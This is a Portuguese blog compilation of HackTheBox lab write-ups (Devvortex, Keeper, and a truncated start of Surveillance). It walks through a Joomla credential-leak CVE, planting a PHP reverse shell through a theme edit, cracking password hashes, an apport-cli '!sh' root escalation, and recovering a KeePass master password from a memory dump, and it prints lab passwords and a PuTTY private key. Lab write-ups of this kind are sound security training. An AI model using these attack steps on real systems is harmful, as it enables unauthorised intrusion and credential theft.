/libraries            (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/libraries/]
/media                (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/media/]
/modules              (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/modules/]
/plugins              (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/plugins/]
/robots.txt           (Status: 200) [Size: 764]
/templates            (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/templates/]
/tmp                  (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/tmp/]
Progress: 20469 / 20470 (100.00%)
===============================================================
2023/11/28 08:42:21 Finished
===============================================================

Através do retorno do gobuster podemos visualizar diversos endpoints interessantes, incluindo um administrativo: http://dev.devvortex.htb/administrator.
Ao acessarmos este endpoint temos a seguinte página de login:

Se trata de uma CMS chamada Joomla, comumente utilizada para criação de ecommerces.
Caso a instalação seja padrão, sem adição de uma segurança a mais o joomla por padrão possui diversos endpoints que expoem dados sensíveis, como podemos notar nos seguintes arquivos:

Versão do Joomla: http://dev.devvortex.htb/plugins/system/cache/cache.xml
Informações internas: http://dev.devvortex.htb/administrator/manifests/files/joomla.xml
Existe um robots.txt exibindo endpoints interessantes: http://dev.devvortex.htb/robots.txt

robots:txt:

User-agent: *
Disallow: /administrator/
Disallow: /api/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

Buscando por vulnerabilidades conhecidas encontramos a CVE-2023-23752. Esta CVE se trata um information leak por conta de um bypass na autenticação, onde é esta exposto dados do usuário do banco de dados em texto plano:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/devvortex]
└─# curl -s http://dev.devvortex.htb/api/index.php/v1/config/application?public=true | jq .
{
  "links": {
    "self": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true",
    "next": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20",
    "last": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"
  },
  "data": [
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "offline": false,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "offline_message": "This site is down for maintenance.<br>Please check back again soon.",
        "id": 224
      }
    },
    ...
    ...
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "user": "lewis",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "password": "P4ntherg0t1n5r3c0n##",
        "id": 224
      }
    },

Os dados de usuário acima são referentes ao acesso ao banco de dados mysql, mas se tentarmos acessar o painel administrativo com os mesmos dados temos sucesso!

E podemos notar que o usuário lewis possui acesso de administrador:

Com este tipo de acesso conseguimos editar o que desejarmos! Com isso podemos editar arquivos do tema é feito em php para enviar uma shell reversa de forma que consigamos acesso ao servidor alvo!

Vamos editar o tema atual chamado cassiopeia e criar um novo arquivo:

E iremos inserir o seguinte shell reverso, feito em php:

Php-reverse-shell

Com o arquivo salvo iremos utilizar o pwncat para ouvir na porta 9001.

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/devvortex]
└─# pwncat-cs -lp 9001
[09:14:01] Welcome to pwncat 🐈!                                                                                    __main__.py:164

E iremos acessar o arquivo run.php que criamos, para executar o mesmo.

Com isso temos o seguinte retorno em nosso pwncat:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/devvortex]
└─# pwncat-cs -lp 9001
[09:14:01] Welcome to pwncat 🐈!                                                                                    __main__.py:164
[09:14:32] received connection from 10.129.54.142:57012                                                                  bind.py:84
[09:14:37] 0.0.0.0:9001: upgrading from /usr/bin/dash to /usr/bin/bash                                               manager.py:957
[09:14:39] 10.129.54.142:57012: registered new host w/ db                                                            manager.py:957
(local) pwncat$
(remote) www-data@devvortex:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Conseguimos shell em nosso alvo com o usuário www-data. Este é o usuário que executa a aplicação, o nginx. Precisamos nos mover lateralmente para o usuário que possui a user flag.
Para isso vamos realizar um recon no host alvo.

Dentro as infos que conseguimos recolher podemos notar que existe um mysql rodando na porta 3306 com o acesso local.

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      862/nginx: worker p
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      862/nginx: worker p
tcp6       0      0 :::22                   :::*                    LISTEN      -

Voltando na vulnerabilidade que exploramos no Joomla, os dados de acesso que conseguimos correspondem ao usuário e senha de acesso ao banco.
Vamos dar uma olhada no seu conteúdo

(remote) www-data@devvortex:/tmp$ mysql -u lewis -h 127.0.0.1 -P 3306 -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 22108
Server version: 8.0.35-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2023, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
| performance_schema |
+--------------------+
3 rows in set (0.00 sec)

Existem três databases, duas padrões do mysql e uma para a CMS Joomla, vamos focar nesta última:


mysql> use joomla;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-------------------------------+
| Tables_in_joomla              |
+-------------------------------+
| sd4fg_action_log_config       |
| sd4fg_action_logs             |
| sd4fg_action_logs_extensions  |
| sd4fg_action_logs_users       |
| sd4fg_assets                  |
| sd4fg_associations            |
| sd4fg_banner_clients          |
| sd4fg_banner_tracks           |
| sd4fg_banners                 |
| sd4fg_categories              |
| sd4fg_contact_details         |
| sd4fg_content                 |
| sd4fg_content_frontpage       |
| sd4fg_content_rating          |
| sd4fg_content_types           |
| sd4fg_contentitem_tag_map     |
| sd4fg_extensions              |
| sd4fg_fields                  |
| sd4fg_fields_categories       |
| sd4fg_fields_groups           |
| sd4fg_fields_values           |
| sd4fg_finder_filters          |
| sd4fg_finder_links            |
| sd4fg_finder_links_terms      |
| sd4fg_finder_logging          |
| sd4fg_finder_taxonomy         |
| sd4fg_finder_taxonomy_map     |
| sd4fg_finder_terms            |
| sd4fg_finder_terms_common     |
| sd4fg_finder_tokens           |
| sd4fg_finder_tokens_aggregate |
| sd4fg_finder_types            |
| sd4fg_history                 |
| sd4fg_languages               |
| sd4fg_mail_templates          |
| sd4fg_menu                    |
| sd4fg_menu_types              |
| sd4fg_messages                |
| sd4fg_messages_cfg            |
| sd4fg_modules                 |
| sd4fg_modules_menu            |
| sd4fg_newsfeeds               |
| sd4fg_overrider               |
| sd4fg_postinstall_messages    |
| sd4fg_privacy_consents        |
| sd4fg_privacy_requests        |
| sd4fg_redirect_links          |
| sd4fg_scheduler_tasks         |
| sd4fg_schemas                 |
| sd4fg_session                 |
| sd4fg_tags                    |
| sd4fg_template_overrides      |
| sd4fg_template_styles         |
| sd4fg_ucm_base                |
| sd4fg_ucm_content             |
| sd4fg_update_sites            |
| sd4fg_update_sites_extensions |
| sd4fg_updates                 |
| sd4fg_user_keys               |
| sd4fg_user_mfa                |
| sd4fg_user_notes              |
| sd4fg_user_profiles           |
| sd4fg_user_usergroup_map      |
| sd4fg_usergroups              |
| sd4fg_users                   |
| sd4fg_viewlevels              |
| sd4fg_webauthn_credentials    |
| sd4fg_workflow_associations   |
| sd4fg_workflow_stages         |
| sd4fg_workflow_transitions    |
| sd4fg_workflows               |
+-------------------------------+

Das diversas tabelas a que nos chama atenção é a sd4fg_users, que guarda as informações sobre os usuários do Joomla, vamos ver seu conteúdo:

mysql> desc sd4fg_users;
+---------------+---------------+------+-----+---------+----------------+
| Field         | Type          | Null | Key | Default | Extra          |
+---------------+---------------+------+-----+---------+----------------+
| id            | int           | NO   | PRI | NULL    | auto_increment |
| name          | varchar(400)  | NO   | MUL |         |                |
| username      | varchar(150)  | NO   | UNI |         |                |
| email         | varchar(100)  | NO   | MUL |         |                |
| password      | varchar(100)  | NO   |     |         |                |
| block         | tinyint       | NO   | MUL | 0       |                |
| sendEmail     | tinyint       | YES  |     | 0       |                |
| registerDate  | datetime      | NO   |     | NULL    |                |
| lastvisitDate | datetime      | YES  |     | NULL    |                |
| activation    | varchar(100)  | NO   |     |         |                |
| params        | text          | NO   |     | NULL    |                |
| lastResetTime | datetime      | YES  |     | NULL    |                |
| resetCount    | int           | NO   |     | 0       |                |
| otpKey        | varchar(1000) | NO   |     |         |                |
| otep          | varchar(1000) | NO   |     |         |                |
| requireReset  | tinyint       | NO   |     | 0       |                |
| authProvider  | varchar(100)  | NO   |     |         |                |
+---------------+---------------+------+-----+---------+----------------+
17 rows in set (0.00 sec)

mysql> select name,username,password from sd4fg_users;
+------------+----------+--------------------------------------------------------------+
| name       | username | password                                                     |
+------------+----------+--------------------------------------------------------------+
| lewis      | lewis    | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |
| logan paul | logan    | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |
+------------+----------+--------------------------------------------------------------+

Conseguimos visualizar que existem dois usuários, o lewis que utilizamos para acessar o Joomla e o mysql e também o usuário logan.
Este segundo usuário do Joomla também é um usuário com shell em nosso alvo!

Iremos utilizar outra aba do nosso terminal para crackear a senha utilizando o John the Ripper:

┌──(root㉿kali)-[~kali/hackthebox/machines-linux/devvortex]
└─# john -w=/usr/share/wordlists/rockyou.txt logan-hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tequieromucho    (logan)
1g 0:00:00:11 DONE (2023-11-28 09:49) 0.08347g/s 117.1p/s 117.1c/s 117.1C/s lacoste..harry
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

E conseguimos a senha do usuário logan. Vamos tentar o acesso ssh ao host alvo:

┌──(root㉿kali)-[~kali/hackthebox/machines-linux/devvortex]
└─# ssh logan@devvortex.htb
logan@devvortex.htb's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-167-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 28 Nov 2023 02:50:15 PM UTC

  System load:           0.0
  Usage of /:            65.7% of 4.76GB
  Memory usage:          22%
  Swap usage:            0%
  Processes:             174
  Users logged in:       0
  IPv4 address for eth0: 10.129.54.142
  IPv6 address for eth0: dead:beef::250:56ff:fe96:3343


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Nov 21 10:53:48 2023 from 10.10.14.23
logan@devvortex:~$ ls -a
.  ..  .bash_history  .bash_logout  .bashrc  .cache  .profile  user.txt

Conseguimos o acesso! E o usuário possível a user flag:

logan@devvortex:~$ cat user.txt
806aa0e222b43fbbb78e8ef7207a2bdd

Escalação de privilégios e root flag

Iremos iniciar listando as permissões do usuário logan:

logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli

O usuário possui permissão para executar como root um binário chamado apport-cli. O Apport é uma ferramenta que permite a análise, coleta de informações de crash reports de programas e do sistema.

Buscando por vulnerabilidades encontramos a seguinte CVE-2023-1326 que afeta o apport-cli até a versão 2.26 e se trata de uma escalação de privilégios, que ocorre quando visualizamos o report gerado.

Podemos ver a versão que temos executando o binário /usr/bin/apport-cli.

logan@devvortex:~$ sudo /usr/bin/apport-cli -v
2.20.11

A /CVE-2023-1326 ocorre exatamente no cenário em que estamos, onde a versão é inferior a 2.26.0 e conseguimos executar o apport com permissões de root. A vulnerabilidade ocorre quando visualizamos o report gerado pelo programa em uma janela do terminal que não exibe o conteúdo completo, neste caso o report utiliza o less, que é utilizado para ler arquivos extensos no linux, um formato de "página", onde é possível se mover pelo conteúdo.
Acontece que o less permite que sejam executados comandos, e como estamos como root...

Possui a seguinte POC.

Que podemos reproduzir em nosso cenário da seguinte forma:

logan@devvortex:~$ sudo /usr/bin/apport-cli -f /tmp/test.txt pid

*** What kind of problem do you want to report?


Choices:
  1: Display (X.org)
  2: External or internal storage devices (e. g. USB sticks)
  3: Security related problems
  4: Sound/audio related problems
  5: dist-upgrade
  6: installation
  7: installer
  8: release-upgrade
  9: ubuntu-release-upgrader
  10: Other problem
  C: Cancel
Please choose (1/2/3/4/5/6/7/8/9/10/C): 1


*** Collecting problem information

The collected information can be sent to the developers to improve the
application. This might take a few minutes.

*** What display problem do you observe?


Choices:
  1: I don't know
  2: Freezes or hangs during boot or usage
  3: Crashes or restarts back to login screen
  4: Resolution is incorrect
  5: Shows screen corruption
  6: Performance is worse than expected
  7: Fonts are the wrong size
  8: Other display-related problem
  C: Cancel
Please choose (1/2/3/4/5/6/7/8/C): 7
.
.dpkg-query: no packages found matching xorg
............

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (1.5 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C):
What would you like to do? Your options are:
  S: Send report (1.5 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): V

Nesta parte será exibido o report utilizando o less, aqui inserimos o seguinte paylaod:

!sh

E assim ganhamos shell como root!

# id
uid=0(root) gid=0(root) groups=0(root)

E assim conseguimos ler a root flag:

# ls -a /root
.  ..  .bash_history  .bashrc  .cleanup  .profile  root.txt  .ssh
# cat /root/root.txt
b47da4fe68c66140a07b853748d02abf

Finalizando assim a máquina Devvortex.

HackTheBox - Writeup Keeper [Retired]

Guilherme Martins — Tue, 23 Apr 2024 09:19:09 +0000

Neste writeup iremos explorar uma máquina easy chamada Keeper que explora as seguintes vulnerabilidades e técnicas.

Defaul Credentials
CVE-2023-32784

Recon e User Flag

Vamos iniciar realizando uma varredura nas portas utilizando o nmap:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/keeper]
└─# nmap -sV --open -Pn -sC 10.129.122.191
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-12 15:04 EDT
Nmap scan report for 10.129.122.191
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3539d439404b1f6186dd7c37bb4b989e (ECDSA)
|_  256 1ae972be8bb105d5effedd80d8efc066 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ao acessar pelo navegador na porta 80 nos é exibido uma mensagem informando para acessar:

http://tickets.keeper.htb/rt

Para isso vamos inserir em nosso /etc/hosts tickets.keeper.htb.
E aqui temos a seguinte página de login:

Se trata de um acesso ao sistema de tickets “Best Practical Solutions”. Também temos a informação do sistema operacional:

RT 4.4.4+dfsg-2ubuntu1 (Debian) Copyright 1996-2019 Best Practical Solutions, LLC.

Buscando na documentação deste sistema de ticket conseguimos o acesso admin utilizando as credenciais default:

user: root
pass: password

Agora precisamos analisar o que conseguimos de informações!

Visualizando os usuários conseguimos encontrar em uma sessão de comentários que nos informa uma senha:

E com essa senha conseguimos acesso com o usuário lnorgaard, que possui a user flag!

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/wifinetictwo]
└─# ssh lnorgaard@10.129.122.191            
...
....
lnorgaard@keeper:~$ ls -a
.  ..  .bash_history  .bash_logout  .bashrc  .cache  .profile  RT30000.zip  .ssh  user.txt  .vimrc
lnorgaard@keeper:~$ cat user.txt 
9b2190c26059e89932dab94b1d8915b5

Escalação de privilégios e Root Flag

Ainda analisando o sistema de tickets notamos que existe um que nos chama atenção. É uma interação entre o usuário root e o usuário lnorgaard.

Esse ticket informa que o usuário root teve problemas com seu KeePass e disponibilizou um dump de memória para que seja analisado. O usuário lnorgaard informa que como é inseguro inserir esse tipo de informação em anexo o arquivo removido e adicionado em sua home.

Voltando para nosso acesso ssh encontramos o arquivo em questão. Ele esta compactado:

/home/lnorgaard/RT30000.zip

Descompactando esse arquivo temos dois arquivos:

KeePassDumpFull.dmp
passcodes.kdbx

O primeiro arquivo é um Mini DuMP crash report, basicamente um dump de memória do windows.

Já o segundo é um arquivo do KeePass que armazena secrets.

Existem diversas vulnerabilidades que forma reportadas no KeePass recentemente, dentre elas temos a CVE-2023-32784. Essa vulnerabilidade permite que seja recuperada a senha em texto plano da memória (Vulnerabilidade ja explorada na máquina Mailroom).

Como temos o arquivo de dump podemos buscar extrair a senha do mesmo.

Podemos confirmar que o arquivo de dump possui a execução através do radare:

[0x00704fde]> iSq~exe
0x610000 0x92a000 ---- C:\Program Files\KeePass Password Safe 2\KeePass.exe

Para realizar a extração das credenciais iremos utilizar um exploit público feito em dotnet:

https://github.com/vdohney/keepass-password-dumper

Para realizar os procedimentos precisamos realizar o download de ambos os arquivos para nossa máquina local, visto que não temos permissão ou pacotes necessários para realizar os procedimentos a seguir no alvo.

Localmente iremos executar o exploit (lembrando que é precise ter o dotnet 7.0):

┌──(root㉿kali)-[/home/…/hackthebox/machines-linux/keeper/keepass-password-dumper]
└─# dotnet run ../KeePassDumpFull.dmp
Found: ●●d
Found: ●●d
...
Password candidates (character positions):
Unknown characters are displayed as "●"
1.:     ●
2.:     ,, l, `, -, ', ], A, I, :, =, _, c, M,
3.:     d,
4.:     g,
5.:     r,
6.:     ●
7.:     d,
8.:      ,
9.:     m,
10.:    e,
11.:    d,
12.:     ,
13.:    f,
14.:    l,
15.:    ●
16.:    d,
17.:    e,
Combined: ●{,, l, `, -, ', ], A, I, :, =, _, c, M}dgr●d med fl●de

Acima temos um resultado um tanto quanto estranho:

●dgr●d med fl●de

Mas pesquisando isso no google temos o seguinte resultado:

Rodgrod med flod é um um pudim dinamarquês e se escreve da seguinte forma usando o alfabeto dinamarquês, que é o alfabeto romano completo. Onde existem mais três letras próprias (Æ, Ø, Å), com nossa resposta da seguinte forma:

rødgrød med fløde

Que podemos confirmar ser a senha de acesso ao arquivo do KeePass utilizando o kpcli:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/keeper]
└─# kpcli --kdb passcodes.kdbx
Provide the master password: *************************

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/>

Analisando o conteúdo deste cofre encontramos os dados de acesso do usuário root:

kpcli:/> ls
=== Groups ===
passcodes/
kpcli:/> ls passcodes
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Recycle Bin/
Windows/

kpcli:/> ls passcodes/Network
=== Entries ===
0. keeper.htb (Ticketing Server)
1. Ticketing System

kpcli:/> show -f 0

Title: keeper.htb (Ticketing Server)
Uname: root
 Pass: F4><3K0nd!
  URL:
Notes: PuTTY-User-Key-File-3: ssh-rsa
       Encryption: none
       Comment: rsa-key-20230519
       Public-Lines: 6
       AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
       8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
       EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
       Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
       FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
       LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
       Private-Lines: 14
       AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
       oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
       kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
       f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
       VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
       UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
       OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
       in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
       SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
       09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
       xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
       AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
       AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
       NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
       Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0

Encontramos usuário, senha e chave do putty do usuário root. No entanto a senha não esta funcional via ssh ou via su.

Mas temos uma chave ppk em nosso vault, vamos salvar em um arquivo em nossa máquina local:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/keeper]
└─# cat root.ppk 
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0

Agora iremos converter a chave ppk do putty para um private key (pem) para acessarmos:

┌──(root㉿kali)-[~]
└─# puttygen root.ppk -O private-openssh -o root-key.pem

Com essa nova chave privada podemos acessar como usuário root, buscar a root flag e finalizar a máquina.

┌──(root㉿kali)-[~kali/hackthebox/machines-linux/keeper]
└─# ssh -i keys/root-key.pem root@10.129.121.255
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

You have new mail.
Last login: Tue Aug  8 19:00:06 2023 from 10.10.14.41
root@keeper:~# cat root.txt
2340facd7897eea0d3b6276c6f269f33

Com isso finalizamos a máquina Keeper!

HackTheBox - Writeup Surveillance [Retired]

Guilherme Martins — Sat, 20 Apr 2024 15:29:02 +0000

Hackthebox

Neste writeup iremos explorar uma máquina linux de nível medium chamada Surveillance que aborda as seguintes vulnerabilidades e técnicas de exploração:

CVE-2023-41892 - Remote Code Execution
Password Cracking com hashcat
CVE-2023-26035 - Unauthenticated RCE
Command Injection

Iremos iniciar realizando uma varredura em nosso alvo a procura de portas abertas:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# nmap -sV --open -Pn 10.129.45.83 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 19:11 EST
Nmap scan report for 10.129.45.83
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Com isso podemos notar que existem duas portas, a porta 22 do ssh e a 80 que esta rodando um nginx.

O nginx é um servidor web e proxy reverso, vamos acessar nosso alvo por um navegador.

Quando acessamos somos redirecionados para http://surveillance.htb, vamos adicionar em nosso /etc/hosts.

Com isso temos a seguinte págine web:

Se trata de um site de uma empresa de segurança e monitoramento que dispõe de câmeras, controle de acessos e etc.

Agora iremos em busca de endpoints e diretórios utilizando o gobuster:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://surveillance.htb/ -k 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://surveillance.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Timeout:                 10s
===============================================================
2023/12/11 19:12:59 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 200) [Size: 304]
/admin                (Status: 302) [Size: 0] [--> http://surveillance.htb/admin/login]
/css                  (Status: 301) [Size: 178] [--> http://surveillance.htb/css/]
/fonts                (Status: 301) [Size: 178] [--> http://surveillance.htb/fonts/]
/images               (Status: 301) [Size: 178] [--> http://surveillance.htb/images/]
/img                  (Status: 301) [Size: 178] [--> http://surveillance.htb/img/]
/index                (Status: 200) [Size: 1]
/js                   (Status: 301) [Size: 178] [--> http://surveillance.htb/js/]
/logout               (Status: 302) [Size: 0] [--> http://surveillance.htb/]
/p13                  (Status: 200) [Size: 16230]
/p1                   (Status: 200) [Size: 16230]
/p10                  (Status: 200) [Size: 16230]
/p15                  (Status: 200) [Size: 16230]
/p2                   (Status: 200) [Size: 16230]
/p3                   (Status: 200) [Size: 16230]
/p7                   (Status: 200) [Size: 16230]
/p5                   (Status: 200) [Size: 16230]
/wp-admin             (Status: 418) [Size: 24409]
Progress: 20469 / 20470 (100.00%)
===============================================================

Aqui temos alguns endpoints interessantes, dentre eles temos o /admin. Aqui conseguimos identificar a CMS que o site foi criado, podemos constatar que se trata de um Craft CMS:

